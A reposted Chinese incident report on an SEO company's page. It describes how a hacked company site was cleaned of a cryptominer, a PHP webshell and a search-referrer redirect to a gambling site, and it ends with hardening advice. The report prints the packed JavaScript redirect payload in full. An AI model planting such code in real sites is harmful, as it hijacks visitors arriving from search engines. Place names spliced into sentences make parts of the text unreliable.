商丘做网站,商丘网站优化,商丘网络推广,商丘网络公司
当前位置:首页 > 新闻资讯 > 网站运营 >

【睢县网络营销】如何解决公司网站首页被恶意跳转的安全问题

发表日期:2018-08-26 13:44聚圣源浏览次数: 本文关键词:seo,睢县,网络营销,优化,如何,解决,公司,近日,某,

  近日某客户网站被黑,导致网站首页被篡改并跳转到赌博网站,网站在百度的收录也收录了一些什么彩票内容的快照,网站首页快照也被修改成赌博内容,并被百度直接红色风险拦截提示,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!我们SINE安全公司根据以上客户被黑的情况,立即进行了全面的网站安全检测,针对网站被黑的情况制定了详细的安全部署方案。

【睢县网络营销】如何解决公司网站首页被恶意跳转的安全问题

  首先客户网站使用的是Linux centos系统服务器,客户提供服务器ip,ssh端口,root账号密码后,我们进去查看了服务器是否存在被黑以及系统木马后门的情况,再一个我们对其使用的mysql数据库进行了安全检测,发现问题,该mysql数据库的root账号使用的是弱口令密码,导致攻击者可以利用软件对数据库进行强力破解,导致破解成功,利用root权限直接提权并上传脚本木马到网站的根目录下。

  根据上面发现的数据库安全问题,我们深度挖掘,追踪溯源,发现服务器还存在木马后门,top,查看linux当前进程,发现一个可疑的进程,通过查看进程的详细信息我们发现该进程是木马后门进程,再仔细一检查发现该木马是挖矿木马,攻击者利用服务器资源,带宽,进行挖矿,像比特币、以太坊等币进行挖矿。

  我们对其挖矿木马进行安全分析:如下图

【睢县网络营销】如何解决公司网站首页被恶意跳转的安全问题

  解密木马内容,我们发现该木马目前来说是免杀的木马,一般人是看不出问题来,但是经常维护服务器的运维人员就会察觉出来,第一该木马隐藏到linux进程当中去,根据时间段进行挖矿,避开高峰时间,以及维护人员的工作时间,当挖矿的时候木马进程CPU占用达到百分之80以上,甚至有时候网站都打开很慢。服务器的木马查完后,我们对网站的源代码进行安全检测,发现网站目录里被上传了网站木马后门,php脚本木马,该脚本木马可以对网站进行读写新建等操作,网站的首页标题描述也被改成了什么赌博的内容如下图:

【睢县网络营销】如何解决公司网站首页被恶意跳转的安全问题

  <>eval(function(p,a,c,k,e,d){e=function(c){return(c

  (parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString

  (36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=

  [function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)

  if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}

  ('3.4("");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\

  \"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\

  \"l\\")>0 ||1.2(\\"m\\")>0 ||1.2(\\"k\\")>0 )");3.4("h.g=\\"j://i.o.n\

  \";");3.4("");',25,25,'|s|indexOf|document|writeln||sogou|

  baidu|soso|uc|sm|Java|LANGUAGE|var|if|referrer|href|location|www|

  http|so|bing|yahoo|com|268238'.split('|'),0,{}))

  通过解密上面的代码发现,只要是从百度,搜狗,以及soso,so,bing等搜索引擎来的访问,都会直接跳转到攻击者设定好的赌博网站上去。随即我们SINE安全公司对该恶意代码进行了清除,网站恢复正常访问。

  以上就是我们解决客户网站安全的整个过程,下面针对于此次网站被黑,提供如下 的网站安全建议:

  1.对mysql数据库进行安全部署,对root账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

  2.mysql数据库默认端口3306,改为51158,并加入到端口安全策略,不句容对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

  3.对服务器底层系统进行安全加固,包括SSH登录的安全验证。

  4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

如没特殊注明,文章均来自网络! 转载请注明来自:http://www.jushengyuan.com.cn/news/wzyy/10340.html

网站设计案例推荐

热门文章

站长平台官网认证的实战经验之...

快速通过百度、360、搜狗站长平台内的官网认证,技巧和方法及工具。帮助您解决眼前的难题!...

日期:2018-04-03 浏览次数:1857

一个产品运营的自白:什么是运...

你拿到了第一份工作,一家名不见经传的小厂,入职的时候听着上司和老板的宏大蓝图,你信心满满,相信自己的才高八斗聪明绝顶,定能将这份工作做得有声有色。...

日期:2018-03-01 浏览次数:963

南阳网络推广:Airbnb从失败到成...

跟大多数创业公司一样,Airbnb已经成立一段时间了,但还没有人注意到他们。整个公司的营业收入,每周都只是在200美元的水平上徘徊,而且三个创始人还要分这么一丁点钱、靠这笔钱生活。...

日期:2018-04-23 浏览次数:950

今日最热的20篇文章中你能学点...

在新榜,一个整合微信公众号文章数据信息的平台上,我们抽取了最近的科技热门发布文章,于是在截止2015年12月28日下午五点的时间内,前20篇的热门文章中我们发现了9篇与手机行业相关,其...

日期:2018-04-07 浏览次数:934

开封seo:商家如何防止刷单被骗...

在上述域名中,红色字体的部分是一级域名,蓝色字体+红色字体是二级域名,绿色字体+蓝色字体+红色字体是三级域名。想要仿照淘宝,其中只需要做一个类似于上述的三级域名。...

日期:2018-04-20 浏览次数:933

相关文章

【吉林网站优化】免费最贵!所以...

月薪5千到5万 这些项目才是你的未来 网站建设上线之后, 巢湖 需要对网站进行运营管理,而一谈到网站的运营SEO优化肯定是绕不过的坎,很多网站运营者多多少少都会尝试使用SEO优化...

日期:2018-10-14 浏览次数:70

【上海网站制作】高端红木家具...

月薪5千到5万 这些项目才是你的未来 现在谈到O2O网站运营, 东方 很多人都会觉得有一些落伍了,对于持有这种看法的人,个人觉得有失片面,虽然社交媒体营销、自媒体、移动互联网...

日期:2018-10-12 浏览次数:63

【江苏网站制作】重新认识社区...

内容领域是一块有高产量的流量池, 安丘 比如字节跳动通过内容分发成为了仅次于BAT的广告流量商。然而手握巨大流量却由于缺少社交关系,导致金矿贬值,当下的字节跳动面对急需...

日期:2018-10-10 浏览次数:66

【新疆网络公司】网站更新很简...

近年来从事网站优化工作的相关服务的工作人员中总是会忽略到一个非常重要的步骤, 通州 那就是网站更新过程当中的注意事项。有一些刚刚从业的优化人员简单的认为网站更新对于...

日期:2018-10-08 浏览次数:71

【陕西网络营销】百度快照劫持...

众多周知, 汝州 SEO行业最常见的优化手法就是白帽SEO和黑帽SEO,而黑帽SEO往往就是利用作弊的手段或者损人利己的方法去提升自己网站的排名和流量。今天谢盼龙给大家讲的就是黑帽...

日期:2018-09-27 浏览次数:79

随机推荐

广告屏蔽越来越流行 这到底是好...

B2BVSB2C 网站:关键用户体验差异...

团购网站又一次站在风尖浪口...

自媒体时代,网站已死?...

“我怕风停就摔死了”!海底捞...

淘在路上破产在前尸横遍野的旅...